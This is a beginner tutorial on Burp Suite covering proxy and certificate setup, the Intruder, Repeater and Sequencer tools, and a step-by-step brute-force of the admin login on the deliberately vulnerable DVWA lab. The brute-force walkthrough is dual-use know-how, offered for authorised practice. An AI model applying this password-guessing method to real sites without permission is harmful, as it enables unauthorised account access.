Burp Suite: Webpage Enumeration and Vulnerability Testing
Where to start with a whole domain at your fingertips?
So you want to start web application security testing or penetration testing? Every security researcher has their favorite tools and one that is sure to top many of their lists of favorites is Burp Suite. In order to begin testing a website for vulnerabilities we must understand what attack vectors are available to us. Burp allows us to list out each domain in our scope and let’s us modify our interactions with the webpage by acting as a middle-man between the user and website.
Disclaimer: Only use Burp on domains that you have permission to scan and attack. Using Burp Suite on domains you do not own can be illegal. Stay safe and use intentionally vulnerable applications for practice. There are some linked at the end of the article.
Learning Goals
- Understanding Burp Suite
- Burp Suite Setup
- Basic Features
- Practical Example Walk through
What is Burp Suite?
Burp Suite is a comprehensive platform for web application security testing. It can be used for detailed enumeration and analysis of web applications. The tool can simply intercept HTTP/S requests and act as a middle-man between the user and web pages. Necessary details are captured from the website as the user navigates around the web. This information provides insight in the security of a web application.
Burp can act as a middle man intercepting traffic from your browser to a webpage allowing you to modify and automate changes to webpage requests.
Burp Suite Setup
Confirm Burp Proxy Listener is Active
- Open burp and navigate to the proxy → options tab
- Verify that the proxy listener is active and set to 127.0.0.1:8080
Configure Proxy in Web Browser
- For Firefox navigate to preferences → advanced → network → settings
- Turn on Manual Proxy Configuration — verify it is set to the same proxy as burp (127.0.0.1 on Port 8080)
Installing Burp SSL Certificate
- Navigate to http://burp and download the certificate by clicking CA Certificate on the right.
- Head back to the network security settings page in Firefox and click on Certificates
- From there, import the certificate you downloaded and check mark all the boxes
Basic Features
To start let’s get familiar with some of the common tabs available in Burp Suite — Intruder, Repeater and Sequencer
Intruder
With Burp Intruder, customized attacks can be automated against web applications. Customizing attacks requires that we specify one or more payloads and the position where the payloads will be placed in the website.
- Use Cases: Enumerating identifiers, harvesting useful data and fuzzing for vulnerabilities.
Repeater
- The repeater can be used to repeat manually manipulated individual HTTP requests. This becomes tremendously useful when trying a variety of payloads on the same request. With repeater you can try parameters on the same page without doing any extra work with the browser. Issuing requests in a specific sequence becomes much easier and you can identify how the page reacts to changing parameters at each step.
- Use Cases: Testing a set of specific parameters on the same webpage request, reissuing requests to manually verify reported issues.
Sequencer
- Burp sequencer can be used to analyze the quality of randomness in a sample of data items. This ultimately means that the sequencer is good for testing data items that are intended to be unpredictable.
- Use Cases: Testing anti-CSRF tokens or password reset tokens etc.
Example Vulnerability Exploitation with Burp
Burp Suite gives us additional automation tools to use while testing a web application.
Damn Vulnerable Web Application
In order to practice attacking vulnerabilities we will use the Damn Vulnerable Web Application (DVWA). DVWA comes pre-loaded with metasploitable 2 but can also be downloaded independently and run off a local server. DVWA is sectioned off for specific attacks as seen in its side navigation bar. This gives us an opportunity to explore common web attacks at varying levels of difficulty.
Once DVWA is up and running, login and navigate to the security tab to change the security level to low. This will make the website vulnerable to a wider range of attacks which makes it easier when getting comfortable with a new tool.
Brute Forcing a Login Page
For this example we will use Burp’s Intruder to alter the HTTP request for the login page within DVWA.
- Start by logging in to DVWA using the username “admin” and the password “password.”
- Verify that the security for DVWA is on low for this attack. Higher levels of security will prevent this attack from working.
- Navigate to the Brute Force section of the side navigation. Here you will see input boxes for username and password.
- Passing in the wrong credentials will pop up an error.
Let’s suppose we know the username for the logged in user on the site. We can use Burp to intercept requests and attempt a list of passwords on this login page.
- Right click on the raw section and Send to Intruder
- From the Intruder → Positions tab we can select the parameters we would like to modify in our request. Off the bat all possible inputs are selected. Hit the clear button on the right to clear selections.
- Highlight the password value. In my case the initial password entered was “1234.” Select that value and hit the add button on the right.
- The last piece to this attack is to add a payload to modify the password value we selected.
- Move to the Payloads tab. The payload set will stay as a simple list and below we will add values to a list for Burp to use in its payload.
- The image below shows the password guesses added to the payload for Burp to try. Common password list can be downloaded online to use for more extensive Brute forcing attempts.
- Click Start Attack to start sniper attack.
- A new window should popup showing the results of Intruder
- How do we know if it worked? Looking at the length tells us that when the payload is “password” we get a different result than the other submissions. That means we should take a closer look at that value.
- Clicking on the row will popup additional actions at the bottom of the window.
- Moving to the Render tab will show us the result when that specific payload is entered.
- As you can see the password worked and we are shown a valid login page. This can be verified by going to DVWA and trying admin and password as login values. The same result should appear.
Congratulations! You have now completed your first attack using Burp to modify HTTP requests. This is a simple example of how Burp can be used to perform application security tests. There are many more web application attacks out there. Burp Suite provides additional tools to work through attacks either manually or automated. Digging deeper into Burp Suite will reveal how powerful it can really be.
What’s Next?
- Check out additional attack walk-throughs on Burp Suite’s website to get familiar with Burp’s role in more intensive attacks.
- Use Burp to perform common web attacks on another vulnerable web application such as Mutillidae or the OWASP WebGoat Project.
- Move on to using Burp in your next web application testing workflow and play with third party extension for Burp to add more functionality.
- Upgrade to the Pro version to checkout the vulnerability scanning capabilities of Burp Suite. If the price for Pro seems too steep then OWASP Zap is a free alternative to Burp that allows for vulnerability scanning.
Additional Resources
- The Burp Methodology — Tutorials provided by Burp Suite
- Burp Suite for Web Application Security — Video tutorials by Bucky Roberts
